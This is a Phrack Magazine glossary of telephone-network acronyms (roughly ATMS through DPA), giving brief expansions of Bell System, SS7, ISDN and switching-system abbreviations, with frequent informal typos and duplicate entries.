ATMS         Automated trunk measurement system
ATN          Assigner's telephone number
ATO          Time-out waiting for address complete signal
ATP          All tests pass
ATR          Alternate trunk routing
ATRS         Automated trouble reporting system
ATTC         Automatic transmission test and control circuit
ATTCOM       AT&T communications
ATTG         Attendant group
ATTIS        AT&T information system
AU           Access unit
AU           Autoscript INTER/TRA blocal 1-26
AU           Auxiliary
AUD          Assignment list audit
AUD          Audits
AUDIT        Audit detected problem.
AUDIX        Audio information exchange
AUP          Access unit port
AUTO         Automaitc
AUTODIN      Automatic digital network
AUTOSEVCOM   Automatic secure voice communications
AUTOVON      Automatic voice network
AUXF         Auxillary frame
AVD          Alternate voice data
AVD          Alternate voice-data
AWI          Awake indication
AZD          All zeros data
B            B side (pair) (lead)
B            Bridged connection
B            Equipment number
B6ZS         Bipolar with 6 zero subsitution
B8ZS         Bipolar eight zero suppression encoding (DS-1)
B8ZS         Bipolar with 8 zeros substitution (T1 pri)
B911         Basic 911
BA           Basic access
BA           Protective alarm (CD) INTER/TRA blocal 1-26
BAF          Blocking acknowledgment failure
BAI          Bridge lifter assignment inquiry
BAL          Balance
BAMAF        Bellcore AMA format
BANCS        Bell administrative network communications system
BANKS        Bell adminastration network systems
BAPCO        Bellsouth advertising & publishing company
BAS          Basic activity subset
BAT          Battery (-48v)
BAx          Business address x (x = number of line)
BB           Blue box
BBD0/1       Binary 0s or 1s detected in b and d channels
BCC          Bellcore client companies
BCC          Block check character
BCC          Blocked call cleared
BCCP         Bearer ccp
BCD          Binary coded decimal
BCD          Blocked call delayed
BCFE         Busy call forwarding extened
BCID         Business customer identifier
BCLID        Bulk calling line identification
BCMS         Basic call management system
BCS          Batch change supplement (NTI) (DMS-100)
BDCA         Unk
BDCS         Broadband digital cross-connect system
BDS          Basic data service
BDT          Billing data transmitter
BEF          Band elimination filter
BEL          Bell
BELLCORE     Bell communications research
BER          Bit error rate
BERT         Bit error rate test
BETRS        Basic exchange telecommunications radio service
BG           Battery and ground signaling
BG/EEE       Below ground electronic equipment enclosures
BHC          Busy hour call
BHC          Busy hour calls
BIB          Backward indicator bit (SS7)
BICU         Bus interface control unit
BIFIFO       Bidirectional fifo
BIR          Bit receiver
BIR          Bus interface register
BISDN        Broadband ISDN
BISP         Business information system program
BISYNC       Binary synchronous communications
BIT          Bit
BIT          Bit transmitter
BITNET       Because-it's-time network
BITR         Bit transceiver
BIX          Building internal cross-connects
BK           Back
BKUP         Backup
BKUP         Requests a backup
BL           Bell & lights INTER/TRA blocal 1-26
BL           Bridge lifter
BL           Bridge lifters - COSMOS command
BL/DS        Busy line/don't answer
BLA          Blocking acknowledgement (SS7: in ISUP)
BLF          Busy line field
BLFCA        Blocking a fully coded addressed international outbound call
              routed to a non-common channel signaling trunk
BLK          Block
BLKD         Blocked
BLO          Blocking (SS7: in ISUP)
BLS          Bridge lifter status
BLS          Business listing service
BLV          Busy line verification
BMC          Billing media coverage
BMD          Batch mode display
BMI          Batch mode input - TIMEREL and DEMAND
BMOSS        Building maintance operations service system
BMR          Batch mode release
BMU          Basic measurement unit (dip)
BND          Band number
BNS          Billed number screening
BNSDBOV      BVA BNS message received indicating data base overload
BNSDBUN      BVA BNS message returned because data base unable to process
BNSGMSG      BVA BNS message received garbled
BNSNBLK      BVA BNS message returned because of network blockage
BNSNCON      BVA BNS message returned because of network congestion
BNSNRTE      BVA BNS message returned because of no routing data
BNSTOUT      BVA BNS message returned because of timeout
BNSUNEQ      BVA BNS message returned because of unequipped destination
BNSURPY      BVA BNS message received with an unexpected reply
BNx          Business name x (x = number of line)
BOC          Bell operating companies
BOC          Bell operating company
BOCC         Building operations control center
BOP          Byte oriented protocol
BOR          Basic output report
BORSCHT      Battery
BOS          Bit oriented signaling
BOS          Business office supervisor
BOSS         Billing and order support system
BOSS         Business office service system (NYNEX)
BOT          Beginning of tape
BOT          Bottom
BPI          Bits per inch
BPOC         Bell point of contact
BPS          Bits per second
BPSK         Binary psk
BPSS         Basic packet-switching service
BPUMP        Backup pump
BR           Bit robbing (CAS-BR)
BRAT         Business residence account tracking system
BRCF         Business and residential customer service feature
BRCS         Business and residential customer services
BRCS         Business residence custom service
BRDCST       Broadcase
BRDG         Bridge
BRDGD        Bridged
BREVC        Brevity control
BRG          Baud rate generator
BRI          Basic rate interface
BRITE        Basic rate interface transmission extension (5ESS)
BRK          Break
BRM          Basic remote module
BRM          Bell communications research practice
BRST         Bridge signature table
BS           Backspace
BS           Banded signaling
BS           Bias battery (-19.1v)
BS           Siren control INTER/TRA blocal 1-26
BSA          Basic serving arrangements
BSBH         Busy season busy hour
BSC          Business service center
BSC/RSC      Business/residence service center
BSCM         Bisynchronous communications module
BSDPE        SDLC B reset
BSE          Basic service elements
BSF          Bell shock force
BSI          British standards institution
BSN          Backward sequence number (SS7)
BSOC         Bell systems operating company
BSP          Bell system practice
BSRF         Basic standard reference frequency
BSRFS        Bell system reference frequency standard
BST          Basic services terminal
BSTJ         Bell system technical journal
BT           British telecom
BTAM         Basic telecommunications access message
BTH          Both
BTL          Bell telephone laboratories
BTN          Billing telephone number
BTSR         Bootstrapper board
BTU          British thermal unit
BUFF         System buffers (NTI)
BVA          Billing validation application
BVAPP        Billing verification and authorization for payment process
BVC          Billing validation center
BVS          Basic voice service
BWM          Broadcast warning message
BWT          Broadcast warning twx
BWTS         Bandwidth test set
BYF          Display the bypass file
BYP          Change the contents of the bypass file
C            Counting rate
C            Current supervision
C            Scan point (SP)
C&A          Centrifugal and absorption
C-ACD        Commercial-automatic call distributor (OSPS)
C-NCH        C-notch
C/I          Command/indicate
C/S UNIT     Combiner and splitter
C1           Circuit system
CA           Cable
CA           Cable number
CA           Collision avoidance
CA           SSN access INTER/TRA blocal 1-26
CABS         Carrier access billing system
CAC          Calling-card authorization center
CAC          Carrier access code
CAC          Circuit administration center
CAC          Customer administration center
CACHE        Cache errors
CAD          Computer-aided dispatch
CAD          Critical alarm display
CADN         Circuit administration.
CADV         Combined alternate data/voice
CAF          Circuit reset acknowledgment failure
CAFD         Comptrollers' automatic message accounting format description
CAFD         Controllers automatic message accounting format description
CAI          Address incomplete received
CAI          Call assembly index
CAIS         Colocated automatic intercept system
CALRS        Centralized automatic loop reporting system
CAM          Communication access method
CAM          Computer aided manufacturing
CAM          Content adressable memory
CAM          Control administration module
CAMA         Central automatic message accounting.
CAMA         Centralized auto message accounting
CAMA         Centralized automatic message accounting
CAN          Cancel
CANC         Cancel (i.451)
CANF         Clear the cancel from
CANT         Clear the cancel to
CAP          Capacitance
CARL         Computerized administrative route layout
CAROT        Centralized automatic reporting on trunks
CAROT        Centralized automatic reporting on trunks.
CAS          Cannel associated signaling
CAS          Circuit associated signaling
CAS          Computerized autodial system
CAS          Craft access system (SARTS)
CAS          Customer account service
CAS7ABM      CAS common channel signaling 7 (CCS7) abort message received
CAS7ACG      CAS CCS7 ACG invoke component received
CAS7GMG      CAS CCS7 received with invalid format reply
CAS7GWE      CAS CCS7 error
CAS7NCG      CAS CCS7 message returned because of network congestion
CAS7NFL      CAS CCS7 message returned because of network failure
CAS7RCR      CAS CCS7 reject component received
CAS7SCG      CAS CCS7 message returned because of subsystem congestion
CAS7SFL      CAS CCS7 message returned because of subsystem failure
CAS7TAN      CAS CCS7 message returned
CAS7TOT      CAS CCS7 query which timed out before reply received
CASDBOV      CAS message received indicating data base overload
CASDBOV      Customer account services (CAS) message received indicating data base overload
CASDBOV      Customer account services (CAS) message received indicating database overload
CASDBUN      CAS message returned
CASGMSG      CAS message received garbled
CASNBLK      CAS message returned because of network blockage
CASNCON      CAS message returned because of network congestion
CASNRTE      CAS message returned because of no routing data
CASTOUT      CAS message returned because of timeout
CASUNEQ      CAS message returned because of unequipped destination
CASURPY      CAS message received with an unexpected reply
CAT          Centrex access treatment
CAT          Craft access terminal
CATLAS       Centralized automatic trouble locating and analysis system
CAY          Create an assembly
CB           OCC audio facilitys INTER/TRA blocal 1-26
CBA          Change back acknowledgement (SS7: in mtp)
CBD          Change back declaration (SS7: in mtp)
CBEMA        Computer and business equipment manufacturers' assc.
CBERR        Correctable bit error
CBS          Crossbar switching
CBX          Computerized branch exchange
CC           Call count
CC           Central control
CC           Central controller
CC           Common channel (CAS-CC)
CC           Common control
CC           Connection confirm
CC           Country code
CC           Country code (ISO 7498)
CC           Initials of person closing report out to catlas.
CC           OCC digital facility-medium speed INTER/TRA blocal 1-26
CC1          Call control 1 (IOS)
CCA          Change customer attributes
CCA          Computer content architecture (ISO 8637/2)
CCBS         Completion of call to busy subscribers (i.253 c)
CCC          Centeral control complex
CCC          Central control complex
CCC          Clear channel capability
CCC          Computer control center
CCD          Change due date - COSMOS command
CCDDBOV      BVA calling card (CCRD) message received indicating data base
               overload
CCDDBUN      BVA CCRD message returned because data base unable to process
CCDGMSG      BVA CCRD message received garbled
CCDNBLK      BVA CCRD message returned because of network blockage
CCDNCON      BVA CCRD message returned because of network congestion
CCDNRTE      BVA CCRD message returned because of no routing data
CCDR         Calling card
CCDTOUT      BVA CCRD message returned because of timeout
CCDUNEQ      BVA CCRD message returned because of unequipped destination
CCDURPY      BVA CCRD message received with an unexpected reply
CCF          Custom calling features
CCH          Connections per circuit per hour
CCIR         Comite' consultatif international des radio communications
CCIR         Consultative committee for radiocomunication (international radio
CCIS         Common channel interoffice signaling
CCITT        Comite' consultatif international telegraphique et telephonique
CCITT        Consultative committee for internat. telephone and telegraph
CCM          Customer control management
CCNC         CCS network control
CCNC         Common channel network controller
CCNC         Computer/communications network center
CCOA         Cabinet control and office alarm
CCP          Call control part
CCR          Clock configuration register
CCR          Continuity check request (SS7: in ISUP)
CCR          Customer-controlled reconfiguration
CCRC         Corrupt crc (IOM2 monitor command)
CCRD         Calling card (5E)
CCRS         Centrex customers ... system
CCS          Centum Call Seconds
CCS          Cluster support system
CCS          Common channel signaling
CCS          Custom calling services  (NTI)
CCS          Hundred (C) call seconds
CCS          Hundred call seconds
CCSA         Common control switching arrangement
CCT          Central control terminal
CCT          Initialize and update the contractor-transducer file
CCTAC        Computer communications trouble analysis center
CCU          Colt computer unit
CCU          Combined channel units
CCU          Communication control unit
CCV          Calling card validation
CD           Call deflection (i.252 e)
CD           Collision detection (->csma/)
CDA          Call data accumulator
CDA          Change distribution attributes
CDA          Coin detection and announcement
CDACS        Concentrating DACS
CDAR         Customer dialed account recording
CDC          Central distrubtion center
CDCF         Cumulative discounted cash flow
CDD          Change due date
CDF          Combined distributing frame
CDF          DTF coin
CDFI         Communication link digital facilities interface
CDI          Circle digit identification
CDI          Connected line identification (i.251 C/E)
CDI          Control and data interface.
CDI          Control data interface
CDIG         Circle digit translation  (NTI)
CDM          Coax data module
CDMA         Code division ma
CDO          Community dial office
CDPR         Customer dial pulse receiver
CDQ1         Custom calling services discount quote
CDR          Call detail record
CDR          Call dial rerouting
CDR          Collision detect input line
CDR          Cut thru dip report
CDRR         Call detail recording and reporting
CDS          Circuit design system
CDS          Codes
CDS          Craft dispatch system
CE           Collision elimination (->CSMA/)
CE           Common equipment data  (NTI)
CE           Conducted emission (EME)
CE           SSN station line INTER/TRA blocal 1-26
CEF          Cable entrance facility
CEI          Comparable efficient interconnection
CEI          Comparably efficient interconnection
CEN          European committee of standards
CENELEC      European committee of standards (electrotechnics)
CEP          Connection endpoint
CEPT         European conference of post/telecom administrations
CES          CC error summary
CEU          CCS estimated usage
CEV          Control environmental vault
CEV          Controlled environment vault
CF           Coin first
CF           OCC special facility INTER/TRA blocal 1-26
CFA          Carrir failure alarms
CFA          Change facility attributes
CFC          Cost function code
CFCA         Communications fraud control association
CFD          Coinless ANI7 charge-a-call
CFGN         Configuration
CFI          Configurable interface (SIPB)
CFINIT       Custom calling feature table
CFN          Call forward number
CFND         Call forward number don't answer
CFNR         Call forwarding no reply (i.252 c)
CFP          Call forwarding busy (i.252 b)
CFP          Print the class of service/features for an electromechanical
               enti
CFR          Code of federal regulations
CFT          Craft
CFU          Call forwarding unconditional (i.252 d)
CFU          Change facility usage
CG           Control group number
CG           OCC telegraph facility INTER/TRA blocal 1-26
CG01         Carrier group in alarm  - 1AESS carrier group
CG03         Reason for above - 1AESS carrier group
CGA          Carrier group alarm
CGA          Carrier group assignment
CGAP         Call gapping
CGAP         Call gapping code controls messages.
CGB          Circuit group blocking (SS7: in ISUP)
CGBA         CGB acknowledgement
CGM          Computer graphics metafile (ISO DIS 8632)
CGN          Concentrator group number
CGNC         Connector group network controller
CGU          Circuit group unblocking (SS7: in ISUP)
CGUA         CGU acknowledgement
CH           Change
CH           OCC digital facility high-speed INTER/TRA blocal 1-26
CHAN         Channel
CHAPS        UNK - a known AT&T System - def. unknown
CHAR         Character
CHG LASG     Change loop assignment
CHK          Check
CHR          Chronical
CI           Concentrator identifier trunk INTER/TRA blocal 1-26
CI0IN        Control interface 0 interrupt
CI1IN        Control interface 1 interrupt
CIB          Centralized intercept bureau
CIC          Carrier identification codes
CIC          Circuit identification code
CIC          Customer Information Center (AT&T)
CICS         Customer information control system
CID          Connection identification
CIE          Company establish company initiated change
CIF          Common intermediate format (for ISDN high end video)
CIH          Craft interface handler
CII          Call identity index
CII          Initial address message (IAM) irregularity (incoming)
CIMAP        Circuit installation and maintance assistance program
CIMAP/CC     Circuit installation and maintenance assistance/control
              center
CIP          Control interface port
CIRR         C/I receive register
CIS          Crimeline information systems
CIS          Customized intercept service
CIXR         C/I transmit register
CJ           OCC control facility INTER/TRA blocal 1-26
CK           Checkbits
CK           OCC overseas connecting facility wide-band INTER/TRA blocal 1-26
CKF          Continuity check failure (incoming)
CKID         Circuit identification
CKL          Circuit location
CKS          Clock select bit
CKT          Circuit
CKT          Circuit.
CKTRY        Cuicuitry
CL           Centrex CO line INTER/TRA blocal 1-26
CLASS        Centralized local area selective signaling
CLASS        Custom local area signaling service
CLC          Common language code for an entity
CLCI         Common language circuit identification
CLCT         Network management control counts
CLDIR        Call direction
CLDN         Calling line directory number
CLEI         Common language equipment identifier
CLF          Creating dips upper bound load factor
CLFI         Common lang facilities identication
CLI          COSMOS processed alit reports
CLI          Calling line ident
CLID         Calling line identification
CLIP         Calling line identification presentation (i.251 c)
CLIR         Calling line identification restriction (i.251 d)
CLK          Clock
CLL          Creating dips lower bound load factor
CLLI         Common-language location identification
CLNK         Communication link
CLNKs        Communication links
CLNORM       Communication link normalization
CLR          Circuit layout record
CLR          Clear
CLRC         Circuit layout record card
CLS          CLCI in serial number format
CLS          Connectless-mode service
CLSD         Closed
CLSV         Class of service
CLT          CLCI telephone number format
CLT          Communications line terminal
CLUS         Cluster data   (NTI)
CM           C-message frequency weighting
CM           Communication module
CM           Connection memory
CM           OCC video facility INTER/TRA blocal 1-26
CMAC         Centralized maintenance and administration center
CMAP         Centralized maintance and administration position
CMC          Call modification completed (SS7: in ISUP)
CMC          Cellular mobile carrier
CMC          Cellular modile carrier
CMC          Construction maintenance center
CMD          Command
CMDF         Combined main distributing frame
CMDS         Centralized message data system
CMF          Capacity main station fill
CMP          Communication module processor
CMP          Communications module processor
CMP          Companion board
CMP          Corrective maintenancean practices
CMPR         Compares
CMR          Call modification request (SS7: in ISUP)
CMR          Cellular mobile radio
CMRJ         CMR reject (SS7: in ISUP)
CMS          Call management system
CMS          Circuit maintance system
CMS          Circuit maintance system 1C
CMS          Circuit maintenance system
CMS          Communications management subsystem
CMS          Conversational monitoring system
CMT          Cellular mobile telephone
CMT          Combined miscellaneous trunk frame
CMU          CCS measured usage
CMU          Colt measurement unit
CN           C-notch frequancy weighting
CN           Change notice
CN           Changel noticee
CN           Connection
CN           SSN network trunk INTER/TRA blocal 1-26
CN/A         Customer name/address
CN02         List of pay phones with coin disposal problems - 1AESS coin
              phone
CN03         Possible trouble - 1AESS coin phone
CN04         Phone taken out of restored service because of possible coin
              fraud
CNA          Communications network application
CNAB         Customer name/address bureau
CNCC         Customer network control center
CNI          Common network interface
CNMS         Cylink network management system
CNS          Complimentary network service
CNS          Concentrating network system
CNT          Count
CNTS         Counts
CNVT         Converted
CO           Central office
CO           Continuous (SARTS)
CO           OCC overseas connecting facility INTER/TRA blocal 1-26
CO UN        Central office unit code
COA          Change over acknowledgement (SS7 in MTE)
COAM         Centralized operation
COAM         Customer owned and maintained
COC          Circuit order control
COCOT        Customer-owned coin-operated telephone
COD          Code
CODCF        Central office data connecting facility
CODEC        Coder/decoder
COE          Central office entity
COE          Central office equipment
COEES        COE engineering system
COEES        Central office equipment engineering system
COER         Central office equipment record
COEST        Central office equipment signature table
COF          Confusion received (outgoing)
COFA         Change of frame alignment (DS-1)
COG          Centralized operations group
COGRDG       Central office grounding
COLP         Connected line identification presentation
COLR         Connected line identification restriction
COLT         Central office limit table
COLT         Central office line tester
COM          Common controller
COM          Communication
COM          Complement size
COM          Computer output microfilm
COM/EXP      PCM-compander/expander
COMM         Comunication
COMMS        Central office maintenance management system
COMMS-PM     Central office maintenance management system-preventive
              Maintenance
COMP         Computed
COMPNY       Company
COMPS        Central Office Managenment Program (GTE)
COMSAT       Communications satellite
CON          Concentrator - COSMOS command
COND         Conditions
CONF         Conference calling (i.254 a)
CONFIG       Configutation
CONN         Connect msg. (i.451)
CONN         Connector
CONN         Nailed-up connections
CONT         Control
CONTAC       Central office network access
CONUS        Continental united states
COO          Change over order (SS7: in MTP)
COP          Call offering procedure
COPY         Data copied from one address to another - 1AESS copy
CORC         Commands and responses definition and compressing program (IOS)
CORC         Customer riginated recent change
CORCs        Customer-originated recent changes
CORNET       Corperate network
COS          Connection-mode service
COSIB        Central office platform operator service interface board
COSMIC       Common systems main interconnection frame system (frame)
COSMOS       Computer system for mainframe operations
COT          Centeral office terminal
COT          Central office technician
COT          Central office terminal
COT          Central office terminal (opposite to RT)
COT          Continuity (SS7: in ISUP)
COTM         Central office overload call timing (NTI)
CP           Cable pair
CP           Call processing parameters  (NTI)
CP           Communication processor (SARTS)
CP           Concentrator identifier signaling link INTER/TRA blocal 1-26
CP           Control program
CPA          Centralized/bulk power architecture
CPC          Cellular phone company
CPC          Circuit provision center
CPC          Circuit provisioning center
CPC          Circuit provisioning center (special services design group)
CPCE         Common peripheral controller equipment
CPD          Central pulse distributor
CPD          Common packet data channels
CPE          Customer premise equipment
CPE          Customer premises equipment
CPG          Call progress (SS7: in ISUP)
CPH          Cost per hour
CPI          COSMOS-premis interface
CPI          Computer private branch exchange interface
CPIE         CP or AM intervention interrupt error
CPM          COSMOS performance monitor
CPM          Citcuit pack module
CPM          Cost per minute
CPMP         Carrier performance measurement plan
CPS          Cycles per second
CPU          CCS capacity usage
CPU          Call pick up
CPU          Call pickup group
CPU          Central processing unit
CQM          Circuit group query (SS7: in ISUP)
CQR          CQM response
CR           Carriage return
CR           Control Record
CR           Control response
CR           OCC backup facility INTER/TRA blocal 1-26
CRAS         Cable repair administrative system
CRC          Customer record center
CRC          Cyclic redundancy check
CRCOK        CRC ok!  (C/I channel code)
CRE          Create
CRED         Credit card calling (i.256 a)
CREF         Connection refused
CREG         Concentrated range extension with gain
CRF          Continuity recheck failure (outgoing)
CRFMP        Cable repair force management plan
CRG          Creg tag
CRIS         Customer records information system
CROT         Centralized automatic reporting of trunks  (NTI)
CRR          Reset received (incoming)
CRS          Centralized results system
CRSAB        Centralized repair service answering bureau
CRST         Specific carrier restricted
CRT          Cathode ray tube
CRT          Cathode-ray tube
CRTM         Central office regular call processing timing  (NTI)
CS           Cable switching
CS           Call Store
CS           Channel service INTER/TRA blocal 1-26
CS           Conducted susceptibility (EMS)
CS           Customer class of service
CSA          Carrier serving area
CSACC        Customer service administration control center
CSAR         Centralized system for analysis and reporting
CSAR         Centralized system for analysis reporting
CSC          Cell site controller
CSD          Circuit specific data
CSDC         Circuit switched digital capability
CSDN         Circuit-switched data network (t.70)
CSF          Critical short form
CSMA/        Carrier sense multiple access
CSMCC        Complex services maintenance control center
CSNET        Computer science network
CSO          Central services organization
CSO          Cold start only (in eoc)
CSP          Coin sent paid
CSP          Coin set paid
CSPDN        Circuit-switched public data network
CSR          Clock shift register
CSR          Customer service records
CSS          Computer sub-system
CSS          Computer subsystem
CSS          Customer service system
CSSC         Customer service system center
CST          Call state  or  current state   or  change state (QUASI SDL)
CST          Combined services terminal
CSU          Channel service unit
CSUS         Centralized automatic message accounting suspension (NTI)
CT           Call transfer (i.252 a)
CT           Control terminal
CT           SSN tie trunk INTER/TRA blocal 1-26
CT01         Manually requested trace line to line information
              follows - 1AESS
CT02         Manually requested trace line to trunk information
              follows - 1AESS
CT03         Intraoffice call placed to a number with CLID - 1AESS call trace
CT04         Interoffice call placed to a number with CLID - 1AESS call trace
CT05         Call placed to number on the ci list - 1AESS call trace
CT06         Contents of the CI list - 1AESS call trace
CT07         ACD related trace - 1AESS call trace
CTC          Central test center
CTC          Centralized test center (DDS)
CTC          Centralized testing center
CTC          Complete a cable transfer or complete a cable throw
CTD          Circuit test data
CTE          Cable throw order establishment
CTF          Display the contacter-transducer file
CTI          Circuit termination identification
CTL          Cable throw with line equipment assignment
CTL          Central operator control
CTM          Cable throw modification
CTM          Contac trunk module
CTMC         Communications terminal module controller
CTMS         Carrier transmission measuring system
CTO          Call transfer outside
CTO          Continuity timeout (incoming)
CTP          Print cable transfer frame work
CTR          Cable throw replacement
CTS          Cable throw summary
CTS          Call through simulator
CTS          Clear to send
CTSS         Cray time sharing system
CTT          Cartridge tape transport
CTT          Cut through tag
CTTC         Cartridge tape transport controller
CTTN         Cable trunk ticket number
CTTU         Central trunk testing unit.
CTU          Channel test unit
CTW          Withdraw a cable transfer or a cable throw
CTX          Centrex group number
CTX          Various centrix verifies
CU           Channel  unit
CU           Channel unit
CU           Control unit
CU           Customer unit
CU/EQ        Common update/equipment system
CU/TK        Common update/trunking system
CUCRIT       Capital utilization criteria
CUG          Closed user group (i.255 a)
CUP          Common update processor
CUSTAT       Control unit hardware status
CUT          Circuit under test
CUTOVER      Cutover (pre-cut) inactive state.
CV           OCC voice grade facility INTER/TRA blocal 1-26
CVN          Vacant national number received (outgoing)
CVR          Compass voice response
CW           Call waiting (i.253 a)
CW           OCC wire pair facility INTER/TRA blocal 1-26
CWC          City-wide centrex
CWD          Call waiting deluxe
CXC          Complex service order input checker
CXM          Centrex table management
CXT          Complex order inquiry for nac review
CZ           OCC access facility INTER/TRA blocal 1-26
CorNet       Corporate network protocol (ECMA and CCITT q.930/931 oriented)

--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 22 of 27

                               {Acronyms Part II}

D            Data
D            Default supervision
D            Digits
D            Dispach
D            Hotel/motel equipment from trouble report (TSPS only)
D-CTL        D channel controller (IDEC)
D/A          Digital to analog
D1PK         DS-1 interface pack  (SCM-10S NTI)
D1PK         DS-1 interface pack (SCM-10S MUX  NTI)
DA           Digital data off-net extention INTER/TRA blocal 1-26
DA           Directory assistance
DAC          Digital to analog converter
DAC          Dispatch Administration Center
DACC         Directort assistance call completion
DACK         Direct memory access acknowledge
DACOM        Data communictions corp. of korea (ROK)
DACS         Digital access cross-connect system
DACS         Digital accessed and cross-connected system
DACS         Directory assistance charging system
DACTVTD      Deactivated
DAEDR        Delimitation
DAIS         Distributed automatic intercept system
DAML         Digital added main line (pair gain)
DAMT         Direct access mechanize testing
DAP          Display administration process
DAP          Document application profile
DARC         Division alarm recording center
DART         Distribution area rehabilitation
DARU         Distributed automatic intercept system audio response unit
DAS          Data auxiliary set
DAS          Directory assistance system
DAS          Distributor and scanner
DAS-WDT      Distributor and scanner-watch dog timer
DAS/C        Directory assistance system/computer
DASD         Direct access storage device
DASS2        Digital access signaling system 2 (BT)
DAU          Digital access unit
DAV          Data above voice
DAY          Delete an assembly
DB           DSSDS 1.5 mb/s access line INTER/TRA blocal 1-26
DB           Decibel
DBA          Data base administrator
DBAC         Data base administration center
DBAS         Data base administration system
DBCS         Data bank control system
DBL          Data base load
DBM          Database manager
DBMS         Data base management system
DBOS         Data bank organization system
DBS          Duplex bus selector
DBSS         Data bank security system
DC           Device cinfirmation (C/I channel code)
DC           Dial code
DC           Direct current
DCC          Data collection computer
DCC          Data country code (ISO 7498)
DCC          Destination code cancellation
DCC          Destination code cancellation control
DCC          Digroup core controller
DCCS         Discontiguous shared segments
DCD          Data collection device
DCE          Data circuit terminal equipment
DCE          Data circuit-terminating equipment
DCE          Data communications equipment
DCE          Digital carrier equipment
DCG          Default cell group
DCH          D channel handler
DCH          D-channel handling bit
DCH          Discharge
DCHOOS       D-channel is out of service.
DCL          Data clock (i.e. IOM2)
DCL          Dec control language
DCLU         Digital carrier line uint
DCLU         Digital carrier line unit
DCM          Digital carrier module
DCME         Digital circuit multiplexing equipment
DCMS         Distributed call measurement system
DCMU         Digital concentrator measurement unit
DCN          List disconnected and changed numbers
DCP          D channel processor
DCP          Duplex central processor
DCPR         Detailed contuing property record (pics/dcpr)
DCPSK        Differential coherent phase-shift keying
DCS          Data communications subsystem
DCS          Digital crosconnect system
DCS          Digital cross-connect system
DCS          Direct current signaling
DCSO         Display compleated service order (lmos command)
DCT          Digital carrier trunk
DCTB         Dct bank
DCTEXT       DCT extended
DCTN         Defense commercial telecommunications network
DCTS         Dimension custom telephone service
DCTUCOM      Directly connected test unit common board
DCTUPORT     Directly connected test unit port circuit
DCn          Device control n
DD           Data downstream (i.e. IOM2)
DD           Delay dial
DD           Disk drives
DD           Due date
DD           Total switching control center (SCC) and field work time.
DDC          Direct department calling
DDCMP        Daily display conversation mode and printer
DDD          Direct distance dialing
DDGT         Digital data group terminal
DDI          Direct dialing-in (i.251 A)
DDN          Defense data network
DDOV         Digital data over voice
DDS          DDS loopback test (SARTS command)
DDS          Dataphone digital service
DDS          Digital data service
DDS          Digital data system
DDS          Digital data system (the network) dataphone  digital
DDS          Digital dataphone service
DDS          Display the DS table
DDX          Digital data exchange
DDX          Distributed data exchange
DEAC         Deactivation (C/I channel code)
DEACT        Deactivate
DEC          Digital equipment corporation
DECT         Digital european cellular phone
DEL          Delete
DEN          Digital equipment number
DERP         Defective equipment replacement program
DES          Data encryption standard
DES          Destination
DEST         Destinations
DET          Detatch MSG. (i.451)
DEV          Deviation
DEV          Device
DEW          Distant early warning (line)
DF           Distributing frame
DF           Distribution frame
DF           HSSDS 1.5 mb/s hub to hub INTER/TRA blocal 1-26
DFC          Disk file controller
DFI          Digital facility interface
DFI          Digital facility interface.
DFI          Digital family interface
DFIH         Digital facility interface circuit pair
DFMS         Digital facility management system
DFTAC        Distributing frame test access circuit
DG           HSSDS 1.5 mb/s hub to earth station INTER/TRA blocal 1-26
DGCT         Diagnostic control table
DGN          Diagnose
DGN          Memory failure in CS/PS diagnostic program - 1AESS mem diag
DH           Digital service INTER/TRA blocal 1-26
DI           Deactivation indication (C/I channel code)
DI           Direct-in dial INTER/TRA blocal 1-26
DI           Unk division?
DIA          Document interchange architecture
DIAG         Diagnostic
DIC          Digital concentrator
DIC          Digital interface controller
DID          DI downstream
DID          Direct inward dialing
DIF          Digital frame interface
DIF          Digital interface
DIF          Digital interface frame
DIFF         Difference
DILEP        Digital line engineering program
DIM          Data in the middle
DIP          Dedicated inside plant  COSMOS command
DIP          Dip creation option
DIP          Document interchange protocol (lower sublayer of OSI layer 6)
DIP          Dual in-line package
DIR          Direction
DIR          Directory
DIR          Standard dip report
DIS          Disconnect
DIS          Display
DISA         Direct inward system access
DISABL       Disable
DISC         Disconnect (LAP-D command)
DISD         Direct inward subscriber access
DIST         Distribute point board
DIU          Deactivate indication
DIU          Digital interface unit
DIU          Digroup interface unit (DACS)
DIV          (Ger) Digital exchange
DIVF         (Ger) Div for long distance service
DIVO         (Ger) Div for local service
DJ           Digit trunk INTER/TRA blocal 1-26
DK           Data link INTER/TRA blocal 1-26
DL           Dial
DL           Dictation line INTER/TRA blocal 1-26
DL1PE        DLI 1 parity error
DL5MDA       Someone who collects each ISDN abbrevation crossing his way
DLAB         Divisor latch access bit
DLC          Data link control
DLC          Data link controller assignment for clusters
DLC          Digital loop carrier
DLCI         Data link connection identifier (i.440: SAPI+TEI)
DLCU         Digital line carrier unit
DLE          Data link escape (ascii control)
DLI          Data link interface
DLI0I        Data link 0 interrupt
DLI1I        Data link 1 interrupt
DLISW        DLI switch error
DLL          Dial long lines
DLM          Data link module
DLN          Direct link node
DLNORSP      Init response not received from data link.
DLOPE        Dual link interface (DLI) 0 parity error
DLP          Data level point
DLS          Digital line section
DLS          Digital link service
DLTHA        Display trouble history all (LMOS command)
DLTU         Digital line trunk unit
DLTU         Digital line/trunk unit
DLU-PG       Digital line unit-pair gain
DLUC         Digital line unit control
DLYR         Delayed readiness
DM           DMR
DM           Delta modulation
DM           Disconnected mode (LAP-D response)
DMA          Direct memory access
DMB          Digital multipoint bridge
DMERT        Duplex multiple environment real time
DMI          Digital multiplexed interface
DML          Data manipulation logic
DMLHG        DSN/AUTOVON MLHG
DMQ          Deferred maintenance queue
DMS          Data management system
DMS          Digital multiplex system  (i.e. DMS 10, DMS 100)
DMS          Digital multiplexed system
DMU          Data manipulation unit
DN           Directory number
DN           Directory numbers
DN           Distribution network panel
DN           Down
DN           Mail distribution frame - COSMOS defult
DNC          Dynamic network controller
DNH          Directory Number Hunting
DNHR         Dynamic non hierarchical routing
DNHR         Dynamic nonhierarchical routing
DNI          Digital network interconnecting
DNIC         Data network identification code
DNIC         Data network identification code (ISO 7498)
DNR          Detaled number record
DNR          Dialed number recorder
DNX          Dynamic network X-connect
DO           Direct-out dial INTER/TRA blocal 1-26
DOC          Dynamic overload control
DOC          Dynamic overload controls messages.
DOCS         Display operator console system
DOD          (USA) Dept. of defense
DOJ          Department of justice
DOM          Data on master group
DOTS         Digital office timing supply
DOV          Data over voice
DP           Demarcation point
DP           Dial pulse
DP           Digital data-2 4 kb/s INTER/TRA blocal 1-26
DPA          Different premises address
DPA          Dispatch
